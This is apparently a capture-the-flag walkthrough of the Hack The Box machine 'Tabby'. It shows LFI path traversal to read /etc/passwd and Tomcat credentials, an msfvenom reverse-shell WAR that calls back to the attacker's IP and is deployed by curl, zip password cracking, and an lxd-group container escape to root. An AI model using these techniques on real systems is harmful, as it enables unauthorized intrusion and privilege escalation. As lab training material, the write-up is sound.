Welcome back reader. Egre55 made another cool Linux box and HTB released it on last Saturday called “Tabby“. The Tabby starts with simple LFI to finding exposed user credential and from there to a reverse shell using Tomcat exploit, from there to privilege escalation to a second user and straight to the root.
The box is in fact straight forward from 2nd user onwards, however, gaining root privilege escalation is entirely based on the Linux Lxd Privilege Escalation which is something new to me.





Enumeration
Let us get started then. As always, the machine IP is added to etc/hosts as tabby.htb and I fire up the NMAP for port scanning.
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 09:36 +03
Discovered open port 80/tcp on 10.10.10.194
Discovered open port 8080/tcp on 10.10.10.194
Discovered open port 22/tcp on 10.10.10.194
Completed SYN Stealth Scan at 09:36, 2.07s elapsed (1000 total ports)
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 338ABBB5EA8D80B9869555ECA253D49D
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=6/21%OT=22%CT=1%CU=41896%PV=Y%DS=2%DC=T%G=Y%TM=5EEF000
OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Uptime guess: 12.366 days (since Tue Jun 9 00:49:25 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 995/tcp)
HOP RTT ADDRESS
1 128.32 ms 10.10.14.1
2 128.88 ms 10.10.10.194
NSE: Script Post-scanning.
Initiating NSE at 09:36
Completed NSE at 09:36, 0.00s elapsed
Initiating NSE at 09:36
Completed NSE at 09:36, 0.00s elapsed
Initiating NSE at 09:36
Completed NSE at 09:36, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.88 seconds
Raw packets sent: 1289 (61.746KB) | Rcvd: 1410 (433.356KB)
NMAP comeback with a result showing SSH port 22, HTTPD 80 and the Apache web server on the port 8080 running.





On vising the tabby.htb on port 80, I found a website of a hosting company Mega Hosting is running. I noticed a section below says “We have recently upgraded several services. Our servers are now more secure than ever. Read our statement on recovering from the data breach” with a link to http://megahosting.htb/news.php?file=statement.
I immediately add the new host name (megahosting.htb) to host file and opened the link. The statement indicated that there is a kind of data breach this company involved with in the past, so I should concentrate my enum on finding backups or some sort of archives.





The Statement:
The statement that company issued to its customers apologizing for previous data breach and assuring them more secure environment.





LFI – Local File Inclusion
As I saw ” ***.php?file= ” I was certain that there should be an LFI on the website. I remember that, I had read somewhere, a PHP script that calls a file from the web server; that possibly a good candidate for LFI testing or ultimately exploit, for example: /script.php?page=index.html. In normal conditions, the basic LFI testing starts with /script.php?page=../../../../../../../../etc/passwd. If the server returns, the results or at least doesn’t give any error, it means we can proceed forward with our testing. I run the same on the url calling /etc/passwd file and yes, the website is vulnerable to LFI





Hosts file:





So, its confirmed that the directory traversal attack is possible on this website. I as well found another web server is running on the port 8080, there is no website, a single page – a Tomcat service running confirmation page. However, there is a surprise. The custom page says “NOTE: For security reasons, using the manager web app is restricted to users with role “manager-gui”. The host-manager web app is restricted to users with role “admin-gui”. Users are defined in /etc/tomcat9/tomcat-users.xml.” at the bottom.





That means, I can enumerate the users using the link /etc/tomcat9/tomcat-users.xml from LFI, let us see. At first, when I visit the page, it was empty, but there is no error as well, so I went ahead and check the source where I found a credential of the user “tomcat”





<user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
Creating a Backdoor WAR file
With having the credentials of the user “TOMCAT”, I proceed to find a login page to use it, but noting seems to be running, I did a little Fuzzing, but couldn’t find something useful. So, I decided to see if the Tomcat could be exploitable with creds I have. After some research, I found this article that says its possible to use MSFVENOM to create a WAR file as backdoor with malicious payload as the reverse shell to our local machine, upload it to the server and get reverse shell, and this supposed to be an authenticated attack. As I have the creds I could import it to the web page and execute it.
I recalled the old HTB machine Jerry, there was a similar approach to create WAR backdoor using MSFVENOM and upload it to the web server using the import feature and get the reverse connection.
root@nav1n:~/htb/tabby # msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.14 LPORT=9999 -f WAR > exploit.war
Payload size: 1081 bytes
Final size of war file: 1081 bytes
root@nav1n:~/htb/tabby #
Uploading the WAR file
I knew that its possible to use cURL to upload , but I was looking for ways to authenticated upload. I found the way in this article.
root@nav1n:~/htb/tabby # curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file exploit.war "http://megahosting.htb:8080/manager/text/deploy?path=/exploit.war"
OK - Deployed application at context path [/exploit.war]
root@nav1n:~/htb/tabby #
Reverse Shell
I start my listener and open the web page at port 8080/exploit.war. My listener activated and I received the reverse shell, I had to upgrade the TTY to have proper shell.





After spending sometime enumerating, I found a zipped folder in the /html/files directory called 16162020_backup.zip – which I assumed should have creds of something like that.
tomcat@tabby:/var/www/html/files$ ls
ls
16162020_backup.zip archive revoked_certs statement
tomcat@tabby:/var/www/html/files$
I download it to my Kali and tried to extract it, but it is protected with password. I used the common passwords, but it didn’t work, so decided to try fcrackzip.





The Zip password is cracked as “admin@it”. I successfully opened the zip but it didn’t take much time for me to understand that it’s a rabbit hole. I have no idea where to use this credential. After a some time I decided to go back to the etc/passwd enumeration, thinking I could find some users who possibly match the password I have. After checking few users, I found the user ASH, I tried to SSH the box using the password I have, but it didn’t work.
root@nav1n:~/htb/tabby # ssh ash@tabby.htb
The authenticity of host 'tabby.htb (10.10.10.194)' can't be established.
ECDSA key fingerprint is SHA256:fMuIFpNbN9YiPCAj+b/iV5XPt9gNRdvR5x/Iro2HrKo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'tabby.htb,10.10.10.194' (ECDSA) to the list of known hosts.
ash@tabby.htb: Permission denied (publickey).
Going through HTB forum, I understood, I should run SU command to switch to user ASH from the TOMCAT user, and the switch user command to ASH worked flawlessly, it means the Zip password is for the user ASH.
Getting User
After loggin-in as ASH I found the user flag in Ash’s home direcory.
ash@tabby:/home$ cd ash
cd ash
ash@tabby:~$ ls
ls
snap user.txt
ash@tabby:~$ cat user.txt
cat user.txt
c65e5c2147cff77908b01a75d02dced4
ash@tabby:~$
Privilege Escalation
Running ID showed me the user Ash is part of the system groups 30(dip),46(plugdev),116(lxd). PlugDev and DIP groups didn’t make any sense to me as those are not mean to exploit, but the LXD group or Linux Container group makes some sense.
So I started to look for POCs and articles on Linux lxd group privilege escalation and found some good reads. Some of them are this, this and this article.
Preparation of the exploit
As per the reading, The first part of the exploitation for privilege escalation is to create a new container (or image) and import it to the box. So as per the article, I should Alpine as its very light weight, so I will not face any issue uploading it to the machine.
root@nav1n:~ # git clone https://github.com/saghul/lxd-alpine-builder.git
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 27, done.
remote: Total 27 (delta 0), reused 0 (delta 0), pack-reused 27
Unpacking objects: 100% (27/27), done.
root@nav1n:~ # cd lxd-alpine-builder
root@nav1n:~/lxd-alpine-builder(master○) # ls
build-alpine LICENSE README.md
root@nav1n:~/lxd-alpine-builder(master○) # ./build-alpine
Determining the latest release... v3.12
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.12/main/x86_64
After building, the builder created an image file called “alpine-v3.12-x86_64-20200621_2005.tar.gz”, I copied it to my tabby working directory.





Then, I host a Python HTTPServer, and import it to the temp directory I created in the user Ash’s directory





Once the image is imported to the box, it needs to be added as an image to LXD. For this purpose I need to run this command and use the list command to check the list of images and I found the image nav1n is added.
alpine-v3.12-x86_64 100%[===================>] 3.07M 216KB/s in 13s
2020-06-21 20:53:58 (249 KB/s) - ‘alpine-v3.12-x86_64-20200621_2005.tar.gz’ saved [3218328/3218328]
ash@tabby:~/temp$ ls
ls
alpine-v3.12-x86_64-20200621_2005.tar.gz
ash@tabby:~/temp$ lxc image import ./alpine-v3.12-x86_64-20200621_2005.tar.gz --alias nav1n
<ine-v3.12-x86_64-20200621_2005.tar.gz --alias nav1n
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first instance, try: lxc launch ubuntu:18.04
ash@tabby:~/temp$ lxc image list
lxc image list
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| nav1n | 4d9d71e56111 | no | alpine v3.12 (20200621_20:05) | x86_64 | CONTAINER | 3.07MB | Jun 21, 2020 at 8:54pm (UTC) |
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
ash@tabby:~/temp$
I followed the steps in the artcile, here I moun tthe root directry
ash@tabby:~/temp$ lxc image list
lxc image list
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| nav1n | 4d9d71e56111 | no | alpine v3.12 (20200621_20:05) | x86_64 | CONTAINER | 3.07MB | Jun 21, 2020 at 8:54pm (UTC) |
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
ash@tabby:~/temp$ lxc init nav1n tester -c security.privileged=true
lxc init nav1n tester -c security.privileged=true
Creating ignite
ash@tabby:~/temp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
<ydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to tester
ash@tabby:~/temp$ lxc start tester
lxc start tester
ash@tabby:~/temp$ lxc exec tester/bin/sh
lxc exec tester/bin/sh
total 4
drwx------ 1 root root 24 Jun 21 21:17 .
drwxr-xr-x 1 root root 114 Jun 21 21:16 ..
-rw------- 1 root root 46 Jun 21 21:18 .ash_history
/home # id
id
uid=0(root) gid=0(root)





So, that’s all. Thank you for reading.
References
- https://pentestlab.blog/2012/08/26/using-metasploit-to-create-a-war-backdoor
- https://www.rapid7.com/db/modules/exploit/multi/http/tomcat_mgr_upload
- https://gist.github.com/pete911/6111816
- https://shenaniganslabs.io/2019/05/21/LXD-LPE.html
- https://ethicalhackingguru.com/the-lxd-privilege-escalation-tutorial-how-to-exploit-lxd/
- https://www.hackingarticles.in/lxd-privilege-escalation/